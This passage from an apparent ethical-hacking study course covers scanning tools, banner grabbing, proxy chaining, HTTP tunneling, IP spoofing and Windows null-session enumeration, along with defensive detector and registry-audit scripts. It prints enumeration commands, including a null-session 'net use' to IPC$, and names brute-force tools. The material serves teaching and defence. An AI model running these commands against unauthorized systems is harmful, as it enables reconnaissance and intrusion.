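        print(f"{f['sport']}->{f['dport']} {flag_names(f['flags'])}: "
              f"{classify_probe(f['flags'])}")
```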
D) Hacking Tools
i. IPEye is a TCP port scanner that can do SYN, FIN, Null, and XMAS
scans. It’s a command-line tool. IPEye probes the ports on a target
system and responds with closed, reject, drop, or open. Closed
means there is a computer on the other end, but it doesn’t listen at
the port. Reject means a firewall is rejecting (sending a reset back)
the connection to the port. Drop means a firewall is dropping
everything to the port, or there is no computer on the other end.
Open means some kind of service is listening at the port. These
responses help a hacker identify what type of system is
responding.
ii. IPSec Scan is a tool that can scan either a single IP address or a
range of addresses looking for systems that are IPSec enabled.
iii. Netscan Tools Pro 2000, Hping2, KingPing, icmpenum, and SNMP
Scanner are all scanning tools and can also be used to fingerprint
the operating system.
iv. Icmpenum uses not only ICMP Echo packets to probe networks,
but also ICMP Timestamp and ICMP Information packets.
Furthermore, it supports spoofing and sniffing for reply packets.
Icmpenum is great for scanning networks when the firewall blocks
ICMP Echo packets but fails to block Timestamp or Information
packets.
v. Hping2 is notable because it contains a host of other features
besides OS fingerprinting such as TCP, User Datagram Protocol
(UDP), ICMP, and raw-IP ping protocols, traceroute mode, and the
ability to send files between the source and target system.
vi. SNMP Scanner allows you to scan a range or list of hosts
performing ping, DNS, and Simple Network Management Protocol
(SNMP) queries.
vii. THC-Scan, Phonesweep, war dialer, and telesweep are all tools
that identify phone numbers and can dial a target to make a
connection with a computer modem. These tools generally work by
using a predetermined list of common usernames and passwords
in an attempt to gain access to the system. Most remote-access
dial-in connections aren’t secured with a password or use very
rudimentary security.
E) Port-Scan Countermeasures
Countermeasures are processes or tool sets used by security
administrators to detect and possibly thwart port scanning of hosts on
their network. The following list of countermeasures should be
implemented to prevent a hacker from acquiring information during a
port scan:
- Proper security architecture, such as implementation of IDS and
  firewalls, should be followed.
- Ethical hackers use their tool set to test the scanning
  countermeasures that have been implemented. Once a firewall is in
  place, a port-scanning tool should be run against hosts on the
  network to determine whether the firewall correctly detects and
  stops the port-scanning activity.
- The firewall should be able to detect the probes sent by
  port-scanning tools. The firewall should carry out stateful
  inspection, which means it examines the data of the packet and not
  just the TCP header to determine whether the traffic is allowed to
  pass through the firewall.
- Network IDS should be used to identify the OS-detection methods
  used by common hacker tools, such as Nmap.
- Only needed ports should be kept open. The rest should be filtered
  or blocked.
- The staff of the organization using the systems should be given
  appropriate training on security awareness. They should also know
  the various security policies they're required to follow.
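The detection side of these countermeasures, as an added example that is not from the book or any tool it names: a small detector that flags the pattern described under "Detecting Ping Sweeps" (one source sending ICMP echo requests to many hosts) and the port-scan pattern (one source probing many distinct ports on a host), run over constructed firewall log lines. The log format, sample lines, time window and thresholds are all assumptions.

```python
"""Detect ping sweeps and port scans in firewall log lines.

Added example, not from the book or any tool it names.  It applies the
two heuristics an IDS uses for this chapter's techniques: many ICMP echo
requests to distinct hosts from one source (ping sweep) and many distinct
ports probed on one host from one source (port scan).  The log format,
sample lines, window and thresholds are all constructed assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # look-back window per source (assumed)
PORT_SCAN_MIN_PORTS = 10         # distinct ports on one host within WINDOW
PING_SWEEP_MIN_HOSTS = 8         # distinct hosts probed by ICMP within WINDOW


def parse_line(line: str) -> dict:
    """Parse the constructed format:
    '2013-06-01T10:00:01 TCP 10.0.0.7 -> 192.168.1.10:21 SYN'
    '2013-06-01T10:00:05 ICMP 10.0.0.7 -> 192.168.1.11 echo-request'"""
    ts, proto, src, _arrow, dst, detail = line.split()
    rec = {"time": datetime.fromisoformat(ts), "proto": proto,
           "src": src, "dst": dst, "dport": None, "detail": detail}
    if proto == "TCP":                     # split host:port for TCP
        rec["dst"], port = dst.rsplit(":", 1)
        rec["dport"] = int(port)
    return rec


class ScanDetector:
    """Sliding window of recent probes per source; alerts once per pattern."""

    def __init__(self):
        self.port_events = defaultdict(deque)   # (src, dst) -> (time, dport)
        self.icmp_events = defaultdict(deque)   # src -> (time, dst)
        self.alerted = set()                    # (kind, src, dst) reported

    @staticmethod
    def _expire(events, now):
        """Drop events older than WINDOW from the left of the deque."""
        while events and now - events[0][0] > WINDOW:
            events.popleft()

    def feed(self, rec: dict):
        """Consume one record; return an alert string or None."""
        now = rec["time"]
        if rec["proto"] == "TCP" and rec["detail"] == "SYN":
            events = self.port_events[(rec["src"], rec["dst"])]
            events.append((now, rec["dport"]))
            self._expire(events, now)
            distinct = {p for _, p in events}
            key = ("port-scan", rec["src"], rec["dst"])
            if len(distinct) >= PORT_SCAN_MIN_PORTS and key not in self.alerted:
                self.alerted.add(key)
                return (f"port scan: {rec['src']} probed {len(distinct)} ports "
                        f"on {rec['dst']} within {WINDOW.seconds}s")
        elif rec["proto"] == "ICMP" and rec["detail"] == "echo-request":
            events = self.icmp_events[rec["src"]]
            events.append((now, rec["dst"]))
            self._expire(events, now)
            distinct = {d for _, d in events}
            key = ("ping-sweep", rec["src"], "*")
            if len(distinct) >= PING_SWEEP_MIN_HOSTS and key not in self.alerted:
                self.alerted.add(key)
                return (f"ping sweep: {rec['src']} sent echo requests to "
                        f"{len(distinct)} hosts within {WINDOW.seconds}s")
        return None


def detect_scans(lines) -> list:
    """Run the detector over log lines in time order; return alerts raised."""
    det, alerts = ScanDetector(), []
    for line in lines:
        if line.strip():
            alert = det.feed(parse_line(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample log: a sweep of 8 hosts, two ordinary connections that
# must not alert, then 12 ports probed on one host within 12 seconds.
SAMPLE_LOG = (
    [f"2013-06-01T10:00:{i:02d} ICMP 10.0.0.7 -> 192.168.1.{10 + i} echo-request"
     for i in range(8)]
    + ["2013-06-01T10:00:30 TCP 10.0.0.5 -> 192.168.1.10:80 SYN",
       "2013-06-01T10:00:31 TCP 10.0.0.5 -> 192.168.1.10:443 SYN"]
    + [f"2013-06-01T10:01:{i:02d} TCP 10.0.0.7 -> 192.168.1.10:{port} SYN"
       for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389])]
)

if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_LOG):
        print("ALERT", alert)
```

A slow scan that spreads its probes over more than the window stays under the threshold, which is why the window and thresholds have to be tuned against the environment's normal traffic.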
5.3.2. Banner Grabbing and OS Fingerprinting Techniques [45]
Banner grabbing and operating system identification, which can also be
defined as fingerprinting the TCP/IP stack, is the fourth step in the
scanning methodology. The process of fingerprinting allows the hacker to
identify particularly vulnerable or high-value targets on the network.
Hackers are looking for the easiest way to gain access to a system or
network. Banner grabbing is an enumeration technique used to find
information about computer systems on a network and the services
running on their open ports. Administrators can use this to take
inventory of the systems and services on their network. An intruder,
however, can use banner grabbing to find network hosts that are running
versions of applications and operating systems with known exploits.
Banner grabbing is the process of opening a connection and reading the
banner or response sent by the application. Many e-mail, FTP, and web
servers will respond to a telnet connection with the name and version of
the software. This aids a hacker in fingerprinting the OS and application
software. For example, a Microsoft Exchange e-mail server would only be
installed on a Windows OS.
A. Active stack fingerprinting is the most common form of
fingerprinting. It involves sending data to a system to see how the
system responds. It’s based on the fact that various operating
system vendors implement the TCP stack differently, and
responses will differ based on the operating system. The responses
are then compared to a database to determine the operating
system. Active stack fingerprinting is detectable because it
repeatedly attempts to connect with the same target system.
B. Passive stack fingerprinting is stealthier and involves examining
traffic on the network to determine the operating system. It uses
sniffing techniques instead of scanning techniques. Passive stack
fingerprinting usually goes undetected by an IDS or other security
system but is less accurate than active fingerprinting.
[45] Book: CEH Certified Ethical Hacker Study Guide, by Kimberly Graves
5.3.3. Drawing Network Diagrams of Vulnerable Hosts
Drawing a network diagram of vulnerable hosts is a must for the further
steps. Once you draw a network diagram, it helps you understand the
network structure, which will help in the attack phase. A number of
network-management tools can assist you with this step. Such tools are
generally used to manage network devices but can be turned against
security administrators by enterprising hackers.
SolarWinds Toolset, Queso, Harris Stat, and Cheops are all network-
management tools that can be used for operating system detection,
network diagram mapping, listing services running on a network,
generalized port scanning, and so on. These tools diagram entire
networks in a GUI interface including routers, servers, hosts and
firewalls. Most of these tools can discover IP addresses, host names,
services, operating systems, and version information.
Netcraft and HTTrack are tools that fingerprint an operating system.
Both are used to determine the OS and web-server software version
numbers. Netcraft is a website that periodically polls web servers to
determine the operating system version and the web-server software
version. Netcraft can provide useful information the hacker can use in
identifying vulnerabilities in the web server software. In addition, Netcraft
has an anti-phishing toolbar and web-server verification tool you can use
to make sure you’re using the actual web server rather than a spoofed
web server.
HTTrack arranges the original site’s relative link structure. You open a
page of the mirrored website in your browser, and then you can browse
the site from link to link as if you were viewing it online. HTTrack can
also update an existing mirrored site and resume interrupted downloads.
5.3.4. Proxy Servers Are Used in Launching an Attack
Preparing proxy servers is the last step in the CEH scanning
methodology. A proxy server is a computer that acts as an intermediary
between the hacker and the target computer. Using a proxy server can
allow a hacker to become anonymous on the network. The hacker first
makes a connection to the proxy server and then requests a connection
to the target computer via the existing connection to the proxy.
Essentially, the proxy requests access to the target computer, not the
hacker's computer. This lets hackers surf the web anonymously or
otherwise hide their attack.
Hacking Tools
SocksChain is a tool that gives a hacker the ability to attack through a
chain of proxy servers. The main purpose of doing this is to hide the
hacker’s real IP address and therefore minimize the chance of detection.
When a hacker works through several proxy servers in series, it’s much
harder to locate the hacker. Tracking the attacker’s IP address through
the logs of several proxy servers is complex and tedious work. If one of
the proxy servers’ log files is lost or incomplete, the chain is broken, and
the hacker’s IP address remains anonymous.
5.4. How Anonymizers Work? [46]
Anonymizers are services that attempt to make web surfing anonymous
by utilizing a website that acts as a proxy server for the web client. The
first anonymizer software tool was developed by Anonymizer.com; it was
created in 1997 by Lance Cottrell. The anonymizer removes all the
identifying information from a user’s computers while the user surfs the
Internet, thereby ensuring the privacy of the user.
To visit a website anonymously, the hacker enters the website address
into the anonymizer software, and the anonymizer software makes the
request to the selected site. All requests and web pages are relayed
through the anonymizer site, making it difficult to track the actual
requester of the webpage. There are also many websites that help you
surf anonymously; search for "anonymous surfing" on Google and you will
find related sites where you can maintain your privacy. For more
information refer to the following site:
http://www.guard-privacy-and-online-security.com/free-proxy-anonymizers.html
5.5. HTTP Tunneling Techniques
HTTP Tunneling is a technique by which communications performed
using various network protocols are encapsulated using the HTTP
protocol, the network protocols in question usually belonging to the
TCP/IP family of protocols. The HTTP protocol therefore acts as a
wrapper for a covert channel that the network protocol being tunneled
uses to communicate.
[46] Book: CEH Certified Ethical Hacker Study Guide, by Kimberly Graves
The HTTP stream with its covert channel is termed an HTTP Tunnel.
HTTP Tunnel software consists of client-server HTTP Tunneling
applications that integrate with existing application software, permitting
them to be used in conditions of restricted network connectivity
including firewalled networks, networks behind proxy servers, and NATs.
A popular method of bypassing a firewall or IDS is to tunnel a blocked
protocol (such as SMTP) through an allowed protocol (such as HTTP).
Almost all IDS and firewalls act as a proxy between a client’s PC and the
Internet and pass only the traffic defined as being allowed. Most
companies allow HTTP traffic because it’s usually benign web access.
However, a hacker using an HTTP tunneling tool can subvert the proxy by
hiding potentially destructive protocols, such as IM or chat, within
innocent-looking protocol packets.
Hacking Tools
HTTPort, Tunneld, and BackStealth are all tools to tunnel traffic though
HTTP. They allow the bypassing of an HTTP proxy, which blocks certain
protocols from accessing the Internet. These tools allow the following
potentially dangerous software protocols to be used from behind an HTTP
proxy:
- E-mail
- IRC
- ICQ
- News
- AIM
- FTP
5.6. IP Spoofing Techniques [47]
A hacker can spoof an IP address when scanning target systems to
minimize the chance of detection. One drawback of spoofing an IP
address is that a TCP session can’t be successfully completed. Source
routing lets an attacker specify the route that a packet takes through the
Internet. This can also minimize the chance of detection by bypassing
IDS and firewalls that may block or detect the attack. Source routing
uses a reply address in the IP header to return the packet to a spoofed
address instead of the attacker’s real address.
[47] http://luizfirmino.blogspot.in/2011/07/identify-ip-spoofing-techniques.html
To detect IP address spoofing, you can compare the time to live (TTL)
values: The attacker’s TTL will be different from the spoofed address’s
real TTL.
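The TTL comparison described above, implemented as a per-source baseline, as an added example that is not from the book or the blog it cites. It assumes the common OS default TTLs (64, 128, 255, plus 32) and infers a hop count from each packet's TTL; the sample packets are constructed.

```python
"""Flag packets whose TTL does not fit the claimed source address.

Added example, not from the book or the blog it cites: the TTL comparison
described above, implemented as a per-source baseline.  A sender starts
from its OS default TTL (commonly 64, 128 or 255) and every router hop
decrements it, so the hop count inferred from a genuine source stays
stable, while a spoofed packet, sent by another host over another path,
usually shows a different hop count.  Sample packets are constructed.
"""
from collections import Counter, defaultdict

INITIAL_TTLS = (32, 64, 128, 255)   # common OS default TTLs (assumed set)


def infer_hops(ttl: int) -> int:
    """Estimate hop count as the distance from the next common initial TTL."""
    if not 0 < ttl <= 255:
        raise ValueError("TTL must be between 1 and 255")
    initial = min(t for t in INITIAL_TTLS if t >= ttl)
    return initial - ttl


class TTLBaseline:
    """Learns the usual hop count per source IP and flags deviations."""

    def __init__(self, learn_packets: int = 5, tolerance: int = 0):
        self.learn_packets = learn_packets    # samples before a source is trusted
        self.tolerance = tolerance            # allowed drift, e.g. route changes
        self.samples = defaultdict(Counter)   # src -> Counter of hop counts

    def expected_hops(self, src: str):
        """Most common hop count seen for src, or None while still learning."""
        seen = self.samples[src]
        if sum(seen.values()) < self.learn_packets:
            return None
        return seen.most_common(1)[0][0]

    def check(self, src: str, ttl: int) -> str:
        """Return 'learning', 'ok' or 'suspect' for one packet from src."""
        hops = infer_hops(ttl)
        expected = self.expected_hops(src)
        if expected is None:
            self.samples[src][hops] += 1
            return "learning"
        if abs(hops - expected) <= self.tolerance:
            self.samples[src][hops] += 1      # genuine traffic reinforces baseline
            return "ok"
        return "suspect"                      # never let a suspect packet retrain


def scan_packets(packets, learn_packets: int = 5) -> list:
    """Run the baseline over (src, ttl) pairs; return indexes of suspect packets."""
    base = TTLBaseline(learn_packets=learn_packets)
    return [i for i, (src, ttl) in enumerate(packets)
            if base.check(src, ttl) == "suspect"]


# Constructed sample: 10.1.2.3 is a host with initial TTL 128 six hops away
# (TTL 122 on arrival).  Packet 6 claims the same source but arrives with
# TTL 53, i.e. initial TTL 64 and eleven hops: a different sender and path.
SAMPLE_PACKETS = [
    ("10.1.2.3", 122), ("10.1.2.3", 122), ("10.1.2.3", 122),
    ("10.1.2.3", 122), ("10.1.2.3", 122), ("10.1.2.3", 122),
    ("10.1.2.3", 53),    # spoofed
    ("10.1.2.3", 122),
]

if __name__ == "__main__":
    print("suspect packet indexes:", scan_packets(SAMPLE_PACKETS))
```

The check only catches a sender whose own initial TTL and path length differ from the genuine host's, so it is a corroborating signal rather than proof of spoofing.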
CHAPTER 6
ENUMERATION
Objective
6.1 Introduction of Enumeration
6.2 Steps of Enumeration
6.3 Tools for Enumeration
6.4 Null Sessions
6.5 SNMP Enumeration
6.6 Zone Transfer
6.7 Countermeasures
6.1. Introduction of Enumeration [48]
Enumeration occurs after scanning and is the process of gathering and
compiling usernames, machine names, network resources, shares, and
services. It also refers to actively querying or connecting to a target
system to acquire this information.
During the enumeration stage, the hacker connects to computers in the
target network and pokes around these systems to gain more
information. While the scanning phase might be compared to a knock on
the door or a turn of the doorknob to see if it is locked, enumeration
could be compared to entering an office and rifling through a file cabinet
or desk drawer for information. It is definitely more intrusive.
[48] Book: CEH Certified Ethical Hacker Study Guide, by Kimberly Graves
Many hacking tools are designed for scanning IP networks to locate
NetBIOS name information. For each responding host, the tools list IP
address, NetBIOS computer name, logged in username, and MAC
address information. On a Windows 2000 domain, the built-in tool net
view can be used for NetBIOS enumeration. To enumerate NetBIOS
names using the net view command, enter the following at the command
prompt:
net view /domain
nbtstat -A <IP address>
The net view command is a great example of a built-in enumeration tool.
net view is an extraordinarily simple command-line utility that will list
domains available on the network and then lay bare all machines in a
domain. Here's how to enumerate domains on the network using net
view:
C:\>net view /domain
Another great built-in tool is nbtstat, which calls up the NetBIOS Name
Table from a remote system. The Name Table contains a great deal of
information, as seen in the following example:
C:\>nbtstat -A 192.168.202.33
6.2. Steps of Enumeration [49]
Hackers need to be methodical in their approach to hacking. The
following steps are an example of those a hacker might perform in
preparation for hacking a target system:
1. Extract usernames using enumeration.
2. Gather information about the host using null sessions.
3. Perform Windows enumeration using the Superscan tool.
4. Acquire the user accounts using the tool GetAcct.
5. Perform SNMP port scanning.
[49] Book: CEH Certified Ethical Hacker Study Guide, by Kimberly Graves
6.3. Tools for Enumeration
i. DumpSec is a NetBIOS enumeration tool. It connects to the target
system as a null user with the net use command. It then
enumerates users, groups, NTFS permissions, and file ownership
information.
ii. Hyena is a tool that enumerates NetBIOS shares and additionally
can exploit the null session vulnerability to connect to the target
system and change the share path or edit the registry.
iii. The SMB Auditing Tool is a password-auditing tool for the
Windows and Server Message Block (SMB) platforms. Windows
uses SMB to communicate between the client and server. The SMB
Auditing Tool is able to identify usernames and crack passwords
on Windows systems.
iv. The NetBIOS Auditing Tool is another NetBIOS enumeration tool.
It's used to perform various security checks on remote servers
running NetBIOS file sharing services.
v. User2SID and SID2User are command-line tools that look up
Windows security identifiers (SIDs) from a username, and vice
versa.
vi. Enum is a command-line enumeration utility. It uses null sessions
and can retrieve usernames, machine names, shares, group and
membership lists, passwords, and Local Security policy
information. Enum is also capable of brute-force dictionary attacks
on individual accounts.
vii. UserInfo is a command-line tool that’s used to gather usernames
and that can also be used to create new user accounts.
viii. GetAcct is a GUI-based tool that enumerates user accounts on a
system.
ix. SMBBF is a SMB brute-force tool that tries to determine user
accounts and accounts with blank passwords.
6.4. Null Sessions [50]
A null session occurs when you log in to a system with no username or
password. NetBIOS null sessions are a vulnerability found in the Common
Internet File System (CIFS) or SMB, depending on the operating system.
Once a hacker has made a NetBIOS connection using a null session to a
system, they can easily get a full dump of all usernames, groups, shares,
permissions, policies, services and more using the Null user account.
You can establish a Null Session with a Windows (NT/2000/XP) host by
logging on with a null user name and password. Using these null
connections allows you to gather the following information from the host:
List of users and groups
List of machines
List of shares
Users and host SIDs (Security Identifiers)
In the enumeration phase, the attacker gathers information such as
network user and group names, routing tables, and Simple Network
Management Protocol (SNMP) data. In addition to standard user accounts,
Windows also supports a special type of user called the 'null' user: a
pseudo-account with no username or password that is nevertheless
allowed to read certain information over the network. The null user can
enumerate account names and shares on domain controllers, member
servers, and workstations. This makes the null user, a user with no
credentials, a convenient way for an attacker to extract information
and go on to compromise the system.
[50] Book: CEH Certified Ethical Hacker Study Guide by Kimberly Graves
The SMB and NetBIOS standards in Windows include APIs that return
information about a system via TCP port 139 (and, from Windows 2000 on,
TCP port 445). One method of connecting a NetBIOS null session to a
Windows system is to use the hidden Inter-Process Communication share
(IPC$). This hidden share is accessible using the net use command. As
mentioned earlier, net use is a built-in Windows command that connects
to a share on another computer. The empty quotation marks ("") after
the share name indicate that you want to connect with no password, and
/u:"" supplies an empty username. To make a NetBIOS null session to a
system with the IP address 192.21.7.1 with the built-in anonymous user
account and a null password, the syntax is as follows:

C:\> net use \\192.21.7.1\IPC$ "" /u:""

Once the net use command has completed successfully, the attacker has a
channel over which to run the enumeration tools listed above (enum,
DumpSec, GetAcct and the like). On a host where the RestrictAnonymous
settings described in section 6.4.2 are in force, the connection itself
may still succeed while the enumeration calls made over it are refused,
so a successful net use on its own does not prove the host is exposed.
Now, let us take a look at a typical authenticated (Kerberos) logon on
Windows 2000, so that the null session can be compared with it:
The client sends a pre-authentication request (a timestamp encrypted
with a key derived from the user's password) to the key distribution
center (KDC) that resides on the domain controller (DC) of the
concerned domain, requesting a ticket granting ticket (TGT).
The KDC fetches the user's key (the password hash) from its database
and decrypts the request with it, checking the time stamp for
recentness of the request. Only a valid user key decrypts the request
successfully.
The KDC sends back a TGT together with a session key. The session key
is encrypted with the user's key; the TGT, encrypted for the KDC
itself, carries among other information the security identifiers (SIDs)
identifying the user and the user's groups.
The client uses the ticket to access the required resources.
A null session is an insecure (unauthenticated) connection with no proof
of identity. No user and password credentials are supplied in the
establishment of the session. No session key is exchanged when
establishing a null session, and hence it is impossible for the system to
send encrypted or even signed messages on behalf of the user under a
null session.
When the LSA is asked to create a token for a remote client
communicating via a null session, it produces a token with a user SID of
S-1-5-7 (the anonymous logon) and a user name of ANONYMOUS LOGON. On
Windows NT and 2000 the Everyone group is included in every token, the
null session's included, and the null session is classified as a
network logon; this is what gives the null user access to file system
shares and named pipes. Windows XP and Server 2003 stopped putting
Everyone in the anonymous token by default; the policy "Network access:
Let Everyone permissions apply to anonymous users" (registry value
EveryoneIncludesAnonymous) turns the old behaviour back on.
Null sessions also have legitimate uses. When the LMHOSTS file uses the
"#INCLUDE" tag to pull in a file from a remote share, the share that
contains the included file must be set up as a null session share,
because the lookup happens before any user has logged on. Similarly,
where a service running under the local "SYSTEM" account needs access
to a network resource, a null session may be established to reach it.
Null sessions can also be established at the API level from languages
such as C++. They can be used to open 'null session pipes', if the
server allows it. A named pipe is an inter-process communication
endpoint; a process on one system can open a pipe on another system
remotely, and on Windows that remote access is carried over SMB
through the IPC$ share. Null sessions can also connect to shares,
including system shares such as \\servername\IPC$. IPC$ is a special
hidden share: it is the interface to the 'server' service on the
machine and is the share through which its named pipes (for example the
SAMR, LSARPC and SRVSVC pipes that the enumeration tools talk to) are
reached remotely. Null sessions make the enumeration of users,
machines, and resources easier for administrative purposes, especially
across domains. This is the lure for the attacker who intends to use a
null session to connect to the machine.
During port scanning, the attacker takes note of any response from TCP
port 139 and 445. Why would these ports interest an attacker? The
answer lies in the SMB protocol.
The SMB (Server Message Block) protocol is known for its use in file
sharing on the Windows NT / 2000 series, among other things. An
attacker positioned on the path can intercept and modify unsigned SMB
packets and forward them so that the server performs actions the client
never requested; alternatively, the attacker could pose as the server
or the client after a legitimate authentication and gain unauthorized
access to data.
SMB is the resource-sharing protocol supported by most Microsoft
operating systems; it historically ran on top of NetBIOS (network basic
input/output system) and is the transport for many other protocols,
notably the named-pipe RPC interfaces used for administration. SMB
signing defends against the interception attack: each packet carries a
message authentication code derived from the session key, so the client
and the server can each verify that a packet came from the
authenticated peer and was not altered in transit. In Windows NT, SMB
ran on top of NBT (NetBIOS over TCP/IP), making it a bulky protocol
with a large header and extra round trips; it used ports 137 and 138
(UDP) and 139 (TCP). In Windows 2000, SMB was allowed to run directly
over TCP/IP without the extra NBT layer, and TCP port 445 started being
used for this purpose.
Each SMB session consumes server resources. Establishing numerous null
sessions will slow or possibly crash the server, even on Windows 2003.
An attacker could repeatedly establish SMB sessions until the server
stops responding, leaving SMB services slow or unresponsive.
For more information about null sessions and the SMB protocol, refer
to the link below:
http://alt.pluralsight.com/wiki/default.aspx/Keith.GuideBook/WhatIsA
NullSession.html
6.4.1. NetBIOS Enumeration and Null Session Countermeasures
NetBIOS null sessions use specific ports on the target machine. A null
session rides on SMB, which is reachable on TCP port 139 (NetBIOS
session service) or TCP port 445 (SMB directly over TCP); the related
enumeration traffic also uses UDP ports 137 and 138 (NetBIOS name and
datagram services) and TCP port 135 (the RPC endpoint mapper). One
countermeasure is to block these ports at the perimeter and on host
firewalls. On an individual host, disabling NetBIOS over TCP/IP (by
unbinding the WINS client from the interface in the network
connection's properties) closes port 139, but it does not close port
445, so on Windows 2000 and later it must be combined with the
RestrictAnonymous settings described below.
An attacker will use the information gained from NULL sessions and try
to logon to the system, using various tools that will try different
username and password combinations. Common attacks against
computers have shown that attackers will typically gain access to the
system, install FTP servers, IRC bots, and DDOS tools, then copy the
illegal (copyrighted and pirated) software up for distribution. The FTP
server Serv-U FTP Server and the IRC bot iroffer are very common as
well. This task is made easier by users who, when prompted for an
administrator password while installing NT/2000/XP, leave it blank.
Please set a password on every account on your machine, if not for the
security of your machine, then for the security of all our machines.
A worm called "Zotob" that takes advantage of the MS05-039
vulnerability relies on NULL sessions to propagate. Follow the
instructions in the next section to protect yourself and of course apply all
operating system patches. Below are instructions on how to manually
disable NetBIOS NULL sessions.
Note, disabling NULL sessions will allow you to have a much more secure
computer; however it could break certain legacy software applications.
6.4.2. How to Disable NetBIOS NULL Sessions
Disabling null sessions on your Windows PC removes the easiest route
for enumeration and for worms such as Zotob. To disable NetBIOS over
TCP/IP (this closes TCP port 139 but leaves SMB over TCP port 445 in
place, so it must be combined with the registry or policy settings
below), perform the following steps:
1. Open the properties of the network connection.
2. Click Internet Protocol (TCP/IP) and then the Properties button.
3. Click the Advanced button.
4. On the WINS tab, select Disable NetBIOS over TCP/IP.
A. Windows XP Home Edition
Note: This also works in Windows 2000 and XP Professional.
1. Open regedt32 and navigate to the following key:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa
2. Choose Edit -> Add Value and enter these values:
Value name: RestrictAnonymous
Data Type: REG_DWORD
Value: 2
Note that the value 2 ("no access without explicit anonymous
permissions") is only honoured by Windows 2000. Windows XP and Server
2003 treat RestrictAnonymous as 0 or 1 and split the remaining
behaviour into the separate values RestrictAnonymousSAM and
EveryoneIncludesAnonymous described under B.
3. Reboot to make the changes take effect.
B. Windows XP Professional Edition and Windows Server 2003
1. Go to Administrative Tools -> Local Security Policy -> Local
Policies -> Security Options. Make sure the following two policies
are enabled:
Network Access: Do not allow anonymous enumeration of SAM
accounts: Enabled (Default)
Network Access: Do not allow anonymous enumeration of SAM
accounts and shares: Enabled
Also confirm that "Network Access: Let Everyone permissions apply to
anonymous users" is Disabled (the default).
This can also be accomplished using the following REG_DWORD values
under HKLM\SYSTEM\CurrentControlSet\Control\Lsa:
RestrictAnonymous=1 (disallows anonymous enumeration of SAM accounts
and shares)
RestrictAnonymousSAM=1 (default; disallows anonymous enumeration of
user accounts)
EveryoneIncludesAnonymous=0 (default; keeps Everyone out of the
anonymous token)
2. Reboot to make the changes take effect.
C. Windows 2000
1. Go to Administrative Tools -> Local Security Settings -> Local
Policies -> Security Options
2. Select "Additional restrictions for anonymous connections" in the
Policy pane on the right
3. From the pull-down menu labeled "Local policy setting", select "No
access without explicit anonymous permissions"
4. Click OK
5. The registry setting equivalent is:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=2
6. Reboot to make the changes take effect.
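The three Lsa values above can be audited offline from a `reg export` of the key, which is convenient when many hosts are involved. The following Python script is an added example written for this page; it is not part of the original course material and not a Microsoft tool. The .reg text it parses is constructed for the demonstration, the interpretation of each value follows the policy names listed under B, and the optional live read uses the standard winreg module and simply returns nothing on non-Windows systems.

```python
import re

# Constructed sample of what `reg export HKLM\SYSTEM\CurrentControlSet\Control\Lsa lsa.reg`
# writes; not taken from a real machine. Two of the values are deliberately weak.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictAnonymous"=dword:00000000
"RestrictAnonymousSAM"=dword:00000001
"EveryoneIncludesAnonymous"=dword:00000001
"LmCompatibilityLevel"=dword:00000003
"""

LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
LSA_SUBKEY = r"SYSTEM\CurrentControlSet\Control\Lsa"


def parse_reg_export(text):
    """Parse the .reg export format into {key_path: {value_name: value}}.
    dword:<hex> becomes an int, "quoted" data a str; other types are kept as raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m and current is not None:
            name, data = m.group(1), m.group(2)
            if data.startswith("dword:"):
                keys[current][name] = int(data[6:], 16)
            elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                keys[current][name] = data[1:-1]
            else:
                keys[current][name] = data
    return keys


def audit_anonymous_access(lsa):
    """Return (findings, ok) for the Lsa values that govern null-session access.
    Absent values take the Windows XP / Server 2003 defaults: RestrictAnonymous=0,
    RestrictAnonymousSAM=1, EveryoneIncludesAnonymous=0."""
    ra = lsa.get("RestrictAnonymous", 0)
    ra_sam = lsa.get("RestrictAnonymousSAM", 1)
    eia = lsa.get("EveryoneIncludesAnonymous", 0)
    findings = []
    if ra == 0:
        findings.append("RestrictAnonymous=0: null sessions may enumerate shares "
                        "(set to 1; the value 2 is only honoured by Windows 2000)")
    if ra_sam == 0:
        findings.append("RestrictAnonymousSAM=0: null sessions may enumerate SAM accounts (set to 1)")
    if eia == 1:
        findings.append("EveryoneIncludesAnonymous=1: the anonymous token carries Everyone's "
                        "permissions (set to 0)")
    return findings, not findings


def audit_reg_export(text):
    """Locate the Lsa key in an export (long or HKLM-abbreviated form) and audit it."""
    keys = parse_reg_export(text)
    lsa = keys.get(LSA_KEY) or keys.get(LSA_KEY.replace("HKEY_LOCAL_MACHINE", "HKLM")) or {}
    return audit_anonymous_access(lsa)


def read_live_lsa():
    """On Windows, read the live values instead of an export; returns {} elsewhere."""
    try:
        import winreg
    except ImportError:
        return {}
    out = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, LSA_SUBKEY) as k:
        for name in ("RestrictAnonymous", "RestrictAnonymousSAM", "EveryoneIncludesAnonymous"):
            try:
                out[name] = winreg.QueryValueEx(k, name)[0]
            except FileNotFoundError:
                pass   # value absent: the default applies
    return out


if __name__ == "__main__":
    findings, ok = audit_reg_export(SAMPLE_REG)
    print("OK" if ok else "WEAK")
    for f in findings:
        print(" -", f)
```

Run against a real export the script reports the two weak settings in the sample; on a Windows host `audit_anonymous_access(read_live_lsa())` checks the running machine directly, and a clean result is an empty findings list.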
6.5. SNMP Enumeration
Simple Network Management Protocol (SNMP) is a TCP/IP standard
protocol used for remotely monitoring and managing hosts, routers and
other devices on a network. SNMP works through a system of managers
and agents. Gathering information about hosts, routers, devices etc.
with the help of SNMP is known as SNMP enumeration. The default
community strings are "public" and "private", and in SNMP versions 1
and 2c they are transmitted in clear text. Default community strings
are a gift to an attacker, as they provide more than enough information
to plan an attack.
